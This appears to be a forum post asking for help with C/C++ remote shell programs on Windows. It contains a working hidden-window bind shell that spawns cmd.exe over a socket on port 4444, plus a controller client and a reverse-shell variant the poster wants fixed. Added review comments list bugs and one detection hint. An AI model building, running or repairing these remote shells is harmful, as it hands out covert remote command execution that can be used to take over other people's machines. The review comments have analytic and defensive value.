[c/c++] remote shell
I will give you the code, it isn't long…
first try these 2 programs (they work very well): server:
#define WIN32_LEAN_AND_MEAN
#include "sock.h"
#include <stdio.h>
#include <windows.h>
#include <winsock2.h>
#pragma comment(lib,"Ws2_32.lib")
#define SHELL_NAME "cmd\0"
/*
 * Bind-shell entry point: listens on TCP port 4444 on every interface, accepts a
 * single connection and starts a hidden "cmd" whose stdin/stdout/stderr are the
 * accepted socket. Built as WinMain, so no console window is created.
 *
 * Review notes:
 *  - Not one Winsock or CreateProcess return value is checked, so every later
 *    step may run against an invalid socket or a process that never started.
 *  - `sa` is filled in but never passed to CreateProcess (both attribute
 *    arguments are NULL); `len` is declared and never used.
 *  - pi.hProcess / pi.hThread are never closed with CloseHandle.
 *  - Detection angle for defenders: a non-console process listening on a fixed
 *    port, plus a cmd.exe child whose standard handles are a socket handle.
 */
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd){
SOCKET sock, sendrecv;              // listening socket / accepted connection
struct sockaddr_in sock_addr,sendrecv_addr;
WSADATA data;
WORD p;                             // requested Winsock version
int len;                            // never used
SECURITY_ATTRIBUTES sa;             // filled in below but never used (see header note)
STARTUPINFO si;
PROCESS_INFORMATION pi;
// connection in server mode...
p=MAKEWORD(2,0);                    // Winsock 2.0
WSAStartup(p,&data);
sock = WSASocket (AF_INET, SOCK_STREAM, 0, 0, 0, 0);
sock_addr.sin_family=PF_INET;
sock_addr.sin_port=htons(4444); sock_addr.sin_addr.s_addr=INADDR_ANY;   // port 4444, all interfaces
bind(sock,(struct sockaddr*)&sock_addr,sizeof(struct sockaddr_in));
listen(sock,1);                     // backlog of one: a single client is expected
int lun = sizeof (struct sockaddr);
sendrecv = accept(sock,(struct sockaddr*)&sendrecv_addr,&lun);   // blocks until a client connects
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.bInheritHandle = TRUE;
sa.lpSecurityDescriptor = NULL;
memset((void *) &si, 0, sizeof(si));
memset((void *) &pi, 0, sizeof(pi));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES + STARTF_USESHOWWINDOW;   // flags combined with '+'; '|' is the idiom for bit flags
si.wShowWindow = SW_HIDE;           // child window hidden
si.hStdInput = (void *)sendrecv;    // SOCKET cast to HANDLE: the child reads its input from the connection
si.hStdOutput = (void *)sendrecv;   // ...and writes its output
si.hStdError = (void *)sendrecv;    // ...and its errors back to it
CreateProcess(NULL, SHELL_NAME, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);   // bInheritHandles=TRUE so the std handles reach the child
closesocket(sendrecv);              // closes the parent's handles only; the child presumably keeps its inherited copy (not verified here)
closesocket(sock);
WSACleanup();
return 0;
}
client:
#include "sock.h"
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock2.h>
#pragma comment(lib,"Ws2_32.lib") //Winsocket lib
#define SHELL_NAME "cmd\0"
/*
 * Interactive controller for the listening program above: connects to
 * 127.0.0.1:4444, prints everything received until a chunk ending in '>' (taken
 * as the cmd prompt), then reads one line from the local console and sends it
 * followed by a separate "\n".
 *
 * Review notes:
 *  - InitClientSocket() returns 0 on failure, so the "connection ok" box is
 *    shown exactly when the connection FAILED; the loop then runs on socket 0.
 *  - recv()'s result is not checked: on 0 or SOCKET_ERROR the indexes
 *    pBuffer[iBytes] and pBuffer[iBytes-1] are out of bounds, and a full
 *    2000-byte read writes the terminator one past the end of pBuffer.
 *  - gets() has no bound; a long console line overflows pBuffer.
 *  - The outer loop never exits, so system("pause") is unreachable.
 *  - `sock` is declared and never used.
 */
int main(){
SOCKET sock, sendrecv;              // sock is never used
sendrecv = InitClientSocket("127.0.0.1", 4444);
if (sendrecv == 0){                 // 0 is the helper's failure value (see note)
MessageBox(0,"connection ok","shell",MB_OK);
}
char pBuffer[2000];
int iBytes;
while(TRUE){
while(TRUE){                        // drain remote output until the prompt character arrives
iBytes = recv(sendrecv,pBuffer,2000,0);
pBuffer[iBytes] = '\0';             // iBytes unchecked (see note)
printf("%s",pBuffer);
if(pBuffer[iBytes-1] == '>') break; // heuristic: trailing '>' means the remote shell is waiting for input
}
pBuffer[0] = '\0';
gets(pBuffer);                      // unbounded read (see note)
send(sendrecv, pBuffer,lstrlen(pBuffer),0);
pBuffer[0] = '\n';pBuffer[1] = '\0';
send(sendrecv, pBuffer,lstrlen(pBuffer),0);   // newline sent as a second packet to end the command line
}
system("pause");                    // unreachable: the loop above never breaks
return 0;
}
InitClientSocket():
/*
 * Opens a TCP connection to pHost:iPort and returns the connected SOCKET.
 * Returns 0 on any failure (socket creation, name resolution, connect); the
 * callers on this page test for that with `== 0`.
 *
 * Review notes:
 *  - The socket() failure test compares with SOCKET_ERROR; Winsock's socket()
 *    reports failure with INVALID_SOCKET, so a failed creation is not caught.
 *  - On the name-resolution and connect failure paths `sock` is never closed.
 *  - pHostinfo->h_addr is copied without checking h_addrtype / h_length.
 *  - WSAStartup (version 1.1) runs on every call with no matching WSACleanup.
 */
SOCKET InitClientSocket(char *pHost, int iPort){
struct sockaddr_in saClient;
struct hostent *pHostinfo;
SOCKET sock;
WORD version;
WSADATA WSAData;
version=MAKEWORD(1,1);              // Winsock 1.1 requested here, unlike the 2.0 used by the listeners
WSAStartup(version, &WSAData);
// create the socket
if ((sock=socket(AF_INET,SOCK_STREAM,0))==SOCKET_ERROR){   // wrong sentinel for Winsock (see note)
return 0;
}
// resolve the host name
pHostinfo=gethostbyname(pHost);
if (pHostinfo==NULL){
return 0;                           // sock leaks on this path
}
// set up the connection to the server...
saClient.sin_family=AF_INET;
saClient.sin_addr=*((struct in_addr *)pHostinfo->h_addr);   // first resolved address, type/length not checked
saClient.sin_port=htons(iPort);
// connect to the server...
if (connect(sock,(struct sockaddr *)&saClient, sizeof(saClient))){   // any non-zero result is treated as failure
return 0;                           // sock leaks on this path
}
return sock;
}
after these two programs, I tried to do the opposite, but it doesn't work, and here I need your help…
server:
#include "sock.h"
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock2.h> //includo la libreria per le funzioni della versione 2 del winsock
#include <time.h>
#pragma comment(lib,"Ws2_32.lib") //Winsocket lib
#define SHELL_NAME "cmd\0"
/*
 * "Reverse" variant, listening side: waits for one connection on TCP 4444,
 * exchanges a greeting, then runs the same prompt-driven relay loop as the
 * earlier client program (recv until '>' / gets / send). This side spawns no
 * process.
 *
 * Review notes:
 *  - `buffer` (100 bytes) is printed with "%s" with recv()'s length ignored and
 *    no terminator written; on a short or failed read printf reads past the data.
 *  - SendTo() is not defined in the visible code (presumably declared in sock.h).
 *  - iBytes is unchecked (0 / SOCKET_ERROR index out of bounds; a full
 *    64000-byte read writes the terminator one past pBuffer); gets() is
 *    unbounded; the loop never ends, so system("pause") is unreachable.
 *  - sa, si, pi and len are declared and never used here; no Winsock return
 *    value is checked; pBuffer puts 64000 bytes on the stack.
 */
int main(){
char pBuffer[64000];
int iBytes;
SOCKET sock, sendrecv;              // listening socket / accepted connection
struct sockaddr_in sock_addr,sendrecv_addr;
WSADATA data;
WORD p;                             // requested Winsock version
int len;                            // never used
SECURITY_ATTRIBUTES sa;             // never used in this program
STARTUPINFO si;                     // never used in this program
PROCESS_INFORMATION pi;             // never used in this program
// connection in server mode...
p=MAKEWORD(2,0);
WSAStartup(p,&data);
sock = WSASocket (AF_INET, SOCK_STREAM, 0, 0, 0, 0); // uses WSASocket() instead of socket()
sock_addr.sin_family=PF_INET;
sock_addr.sin_port=htons(4444); // use port 4444
sock_addr.sin_addr.s_addr=INADDR_ANY;
bind(sock,(struct sockaddr*)&sock_addr,sizeof(struct sockaddr_in));
listen(sock,1);
int lun = sizeof (struct sockaddr);
sendrecv = accept(sock,(struct sockaddr*)&sendrecv_addr,&lun);   // blocks until a client connects
char buffer[100];
recv(sendrecv,buffer,sizeof(buffer),0);   // length ignored, buffer not terminated (see note)
printf("%s\n",buffer);
SendTo(sendrecv,"ciao client, sono il server...");   // helper from sock.h, not shown on this page
Sleep(2000);
while(TRUE){
while(TRUE){                        // drain remote output until the prompt character arrives
iBytes = recv(sendrecv,pBuffer,64000,0);
pBuffer[iBytes] = '\0';             // iBytes unchecked (see note)
printf("%s",pBuffer);
if(pBuffer[iBytes-1] == '>') break; // heuristic: trailing '>' means the remote side is waiting for input
}
pBuffer[0] = '\0';
gets(pBuffer);                      // unbounded read (see note)
send(sendrecv, pBuffer,lstrlen(pBuffer),0);
pBuffer[0] = '\n';pBuffer[1] = '\0';
send(sendrecv, pBuffer,lstrlen(pBuffer),0);   // newline sent as a second packet to end the command line
}
system("pause");                    // unreachable: the loop above never breaks
return 0;
}
client:
#define WIN32_LEAN_AND_MEAN
#include "sock.h"
#include <stdio.h>
#include <windows.h>
#include <winsock2.h> //includo la libreria per le funzioni della versione 2 del winsock
#include <time.h>
#pragma comment(lib,"Ws2_32.lib") //Winsocket lib
#define SHELL_NAME "cmd\0"
/*
 * "Reverse" variant, connecting side: connects to 127.0.0.1:4444, exchanges a
 * greeting, waits 5 s, then starts a hidden "cmd" with its standard handles set
 * to the connected socket (the same CreateProcess setup as the first program).
 *
 * Review notes:
 *  - When InitClientSocket() returns 0 a failure box is shown, but execution
 *    continues with that 0 socket instead of returning.
 *  - `buffer` is printed with "%s" with recv()'s length ignored and no
 *    terminator written; also, printf() from a WinMain program normally has no
 *    console attached, so the greeting is unlikely to be visible (inferred).
 *  - `sock` is never assigned yet is passed to closesocket(); `len` is unused;
 *    `sa` is filled in but never passed to CreateProcess; pi's handles are
 *    never closed; no return value is checked.
 */
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd){
SOCKET sock, sendrecv;              // sock is never assigned (see note)
struct sockaddr_in sock_addr,sendrecv_addr;   // never used
WSADATA data;                       // never used
WORD p;                             // never used
int len;                            // never used
SECURITY_ATTRIBUTES sa;             // filled in below but never used (see header note)
STARTUPINFO si;
PROCESS_INFORMATION pi;
sendrecv = InitClientSocket("127.0.0.1", 4444);
if (sendrecv == 0){                 // helper's failure value; execution continues anyway
MessageBox(0,"connessione non avvenuta","shell",MB_OK);
}
SendTo(sendrecv,"ciao server, sono il client...");   // helper from sock.h, not shown on this page
char buffer[100];
recv(sendrecv,buffer,sizeof(buffer),0);   // length ignored, buffer not terminated (see note)
printf("%s\n",buffer);
Sleep(5000);
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.bInheritHandle = TRUE;
sa.lpSecurityDescriptor = NULL;
memset((void *) &si, 0, sizeof(si));
memset((void *) &pi, 0, sizeof(pi));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES + STARTF_USESHOWWINDOW;   // flags combined with '+'; '|' is the idiom for bit flags
si.wShowWindow = SW_HIDE;           // child window hidden
si.hStdInput = (void *)sendrecv; // standard input can be assigned directly to the socket
si.hStdOutput = (void *)sendrecv; // a cast is needed because the socket is an integer,
si.hStdError = (void *)sendrecv; // while a HANDLE-typed value (pointer to void) is required
CreateProcess(NULL, SHELL_NAME, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);   // bInheritHandles=TRUE; return value unchecked
closesocket(sendrecv);
closesocket(sock);                  // sock was never assigned (see note)
WSACleanup();
return 0;
}
thanks again and sorry for the potentially weird zip file…